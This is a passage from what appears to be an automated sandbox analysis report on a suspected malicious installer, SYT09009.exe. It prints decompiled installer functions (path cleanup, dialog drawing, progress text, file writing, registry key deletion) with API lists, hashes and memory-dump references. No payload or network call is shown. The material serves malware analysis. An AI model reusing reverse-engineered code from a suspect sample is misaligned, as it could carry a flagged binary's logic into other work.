				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405AFC(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405ABA("*?|<>/\":", _t5))) == 0) {
							E00405C4B(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004063d4
0x004063dc
0x004063f0
0x004063f0
0x004063f6
0x00406403
0x00406403
0x00406404
0x00406406
0x0040640a
0x0040640c
0x00406415
0x00406417
0x00406431
0x00406439
0x00406439
0x0040643e
0x00406440
0x00406442
0x00406446
0x00406447
0x0040644a
0x00406452
0x00406454
0x00406458
0x00000000
0x00000000
0x0040645e
0x00406463
0x00000000
0x00000000
0x00000000
0x00406463
0x00406468

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SYT09009.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
CharNextA.USER32(?,"C:\Users\user\Desktop\SYT09009.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
CharPrevA.USER32(?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3
*?|<>/":, xrefs: 0040641A
"C:\Users\user\Desktop\SYT09009.exe" , xrefs: 0040640E

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\SYT09009.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-652649749
Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD

Uniqueness

Uniqueness Score: -1.00%

Function 004041E2, Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004041E2(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x004041f4
0x004042aa
0x00000000
0x004042aa
0x00404205
0x00404209
0x00000000
0x00404223
0x00404223
0x0040422c
0x00000000
0x00000000
0x0040422e
0x0040423a
0x0040423d
0x0040423d
0x00404243
0x00404249
0x00404249
0x00404255
0x0040425b
0x00404262
0x00404265
0x00404268
0x0040426a
0x0040426a
0x00404272
0x00404278
0x00404278
0x00404282
0x00404287
0x0040428a
0x0040428f
0x00404292
0x00404292
0x004042a2
0x004042a2
0x00000000
0x004042a5

APIs

GetWindowLongA.USER32 ref: 004041FF
GetSysColor.USER32(00000000), ref: 0040423D
SetTextColor.GDI32(?,00000000), ref: 00404249
SetBkMode.GDI32(?,?), ref: 00404255
GetSysColor.USER32(?), ref: 00404268
SetBkColor.GDI32(?,?), ref: 00404278
DeleteObject.GDI32(?), ref: 00404292
CreateBrushIndirect.GDI32(?), ref: 0040429C

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040521E, Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040521E(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42ec04; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42f4f4;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E0040618A(0, _t39, 0x42a070, 0x42a070, _a4);
					}
					_t26 = lstrlenA(0x42a070);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42ebe8, 0x42a070);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42a070;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x42a070)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x42a070, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00405224
0x00405230
0x00405233
0x00405239
0x00405245
0x00405248
0x0040524b
0x00405251
0x00405251
0x00405257
0x0040525f
0x00405262
0x0040527f
0x00405283
0x0040528c
0x0040528c
0x00405296
0x0040529f
0x004052ab
0x004052b2
0x004052b6
0x004052b9
0x004052cc
0x004052da
0x004052da
0x004052de
0x004052e0
0x004052e3
0x00000000
0x004052e3
0x00405264
0x0040526c
0x00405274
0x0040527a
0x00000000
0x0040527a
0x00405274
0x00405262
0x004052ed

APIs

lstrlenA.KERNEL32(0042A070,00000000,00422648,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
lstrlenA.KERNEL32(00403233,0042A070,00000000,00422648,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00422648,7519EA30), ref: 0040527A
SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
SendMessageA.USER32 ref: 004052B2
SendMessageA.USER32 ref: 004052CC
SendMessageA.USER32 ref: 004052DA

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: d1e8e7ce2c2523d172669f7ce86ee08a3412313cfa29fa6867aa2e5f83f46da0
Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
Opcode Fuzzy Hash: d1e8e7ce2c2523d172669f7ce86ee08a3412313cfa29fa6867aa2e5f83f46da0
Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00404ACE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404ACE(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404adc
0x00404ae9
0x00404aef
0x00404b2d
0x00404b2d
0x00404b3c
0x00404b43
0x00000000
0x00404b45
0x00404af1
0x00404b00
0x00404b08
0x00404b0b
0x00404b1d
0x00404b23
0x00404b2a
0x00000000
0x00404b2a
0x00000000

APIs

SendMessageA.USER32 ref: 00404AE9
GetMessagePos.USER32 ref: 00404AF1
ScreenToClient.USER32 ref: 00404B0B
SendMessageA.USER32 ref: 00404B1D
SendMessageA.USER32 ref: 00404B43

Strings

f, xrefs: 00404B1F

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402DBA, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x41d440; // 0x877fe
					_t11 =  *0x42944c;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402dc7
0x00402dd5
0x00402ddb
0x00402ddb
0x00402de9
0x00402deb
0x00402df1
0x00402df8
0x00402dfa
0x00402dfa
0x00402e10
0x00402e20
0x00402e32
0x00402e32
0x00402e3a

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
MulDiv.KERNEL32(000877FE,00000064,?), ref: 00402E00
wsprintfA.USER32 ref: 00402E10
SetWindowTextA.USER32(?,?), ref: 00402E20
SetDlgItemTextA.USER32 ref: 00402E32

Strings

verifying installer: %d%%, xrefs: 00402E0A

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004027DF, Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004027DF(int __ebx) {
				void* _t26;
				long _t31;
				int _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402BCE(0xfffffff0);
				 *(_t56 - 0x78) = _t23;
				if(E00405AFC(_t50) == 0) {
					E00402BCE(0xffffffed);
				}
				E00405C6B(_t50);
				_t26 = E00405C90(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42f438;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403300(_t45);
						E004032EA(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x38) = _t54;
						if(_t54 != _t45) {
							E004030D8( *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x8c) =  *_t54;
								E00405C4B( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x8c);
							}
							GlobalFree( *(_t56 - 0x38));
						}
						E00405D37( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E004030D8(0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x78));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}

0x004027df
0x004027e1
0x004027ed
0x004027f0
0x004027fa
0x004027fe
0x004027fe
0x00402804
0x00402811
0x00402819
0x0040281c
0x00402822
0x00402830
0x00402835
0x00402839
0x0040283c
0x00402845
0x00402851
0x00402855
0x00402858
0x00402862
0x00402887
0x00402869
0x0040286e
0x00402876
0x0040287c
0x00402881
0x00402881
0x0040288e
0x0040288e
0x0040289b
0x004028a1
0x004028b3
0x004028b3
0x004028b9
0x004028b9
0x004028c4
0x004028c5
0x004028c9
0x004028cd
0x004028d3
0x004028d3
0x004028da
0x004022dd
0x00402a5d
0x00402a69

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
GlobalFree.KERNEL32 ref: 0040288E
GlobalFree.KERNEL32 ref: 004028A1
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
Instruction ID: 50ad9526884773a844389ca9465edd1da2989015e588fa45899e7f45ead5980e
Opcode Fuzzy Hash: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
Instruction Fuzzy Hash: 78216D72800128BBDF217FA5CE49D9E7A79EF09364F24423EF550762D1CA794D418FA8

Uniqueness

Uniqueness Score: -1.00%

Function 00402CD0, Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E00405F7D(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406500(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402cdb
0x00402ce4
0x00402ced
0x00402cf9
0x00402d02
0x00402d0c
0x00402d31
0x00402d37
0x00402d3c
0x00402d3d
0x00402d6d
0x00402d46
0x00402d48
0x00402d98
0x00402d9b
0x00000000
0x00402da1
0x00402d57
0x00402d5c
0x00402d5e
0x00000000
0x00000000
0x00402d66
0x00402d6b
0x00402d6c
0x00402d6c
0x00402d79
0x00402d81
0x00402d88
0x00000000
0x00402db1
0x00000000
0x00402d90
0x00402d1c
0x00402d2f
0x00000000
0x00000000
0x00000000
0x00402d2f
0x00402db7

APIs

RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D65, Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402BAC(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402BCE(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x42f420,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E00406055();
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d65
0x00401d69
0x00401d7e
0x00401d6b
0x00401d6d
0x00401d73
0x00401d73
0x00401d84
0x00401d87
0x00401d91
0x00401d94
0x00401d9c
0x00401dad
0x00401db0
0x00401dbb
0x00401db2
0x00401db4
0x00401db4
0x00401dbf
0x00401dcc
0x00401df3
0x00401e02
0x00401e10
0x00401e18
0x00401e20
0x00401e20
0x00401e29
0x00401e2f
0x004029a5
0x004029a5
0x00402a5d
0x00402a69

APIs

GetDlgItem.USER32 ref: 00401D7E
GetClientRect.USER32 ref: 00401DCC
LoadImageA.USER32 ref: 00401DFC
SendMessageA.USER32 ref: 00401E10
DeleteObject.GDI32(00000000), ref: 00401E20

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00401E35, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402BAC(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x40b838->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b848 = E00402BAC(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
